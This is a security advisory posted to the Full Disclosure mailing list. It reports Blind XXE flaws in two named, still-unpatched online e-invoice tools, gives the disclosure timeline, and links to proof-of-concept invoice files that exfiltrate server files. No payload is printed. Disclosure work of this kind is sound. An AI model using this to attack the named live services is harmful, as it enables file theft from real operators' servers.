During tests of electronic invoicing tools, I discovered multiple XXE and Blind XXE vulnerabilities in online tools parsing electronic invoices in XML formats.
While most of the affected tools have fixed these vulnerabilities, two online tools remain vulnerable to Blind XXE attacks, allowing exfiltration of files. Disclosure to the affected operators happened more than 90 days ago. Vulnerable tools: https://validator.invoice-portal.de/ https://xrechnung.rib.de/ (only the visualization tool) In both cases, uploading an invoice with a blind XXE payload leads to HTTP requests to the attacker's server and exfiltrates file content. Proof of concepts, e.g., to exfiltrate /etc/hostname (ciibxxehostname.xml), can be found here: https://github.com/hannob/invoicesec Timeline validator.invoice-portal.de: 2025-11-17 Informed support contact about Blind XXE vulnerability, no reply 2026-02-16 Still vulnerable, public disclosure Timeline xrechnung.rib.de: 2025-10-29 Reported "standard" XXE via contact form, no reply 2025-11-18 Re-test, incomplete fix: "Standard" XXE fixed, Blind XXE still possible 2025-11-18 Re-reported incomplete fix, no reply 2026-02-16 Still vulnerable, public disclosure This was part of a larger research effort about the security of EU electronic invoices: https://invoice.secvuln.info/ -- Hanno Böck - Independent security researcher https://itsec.hboeck.de/ https://badkeys.info/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
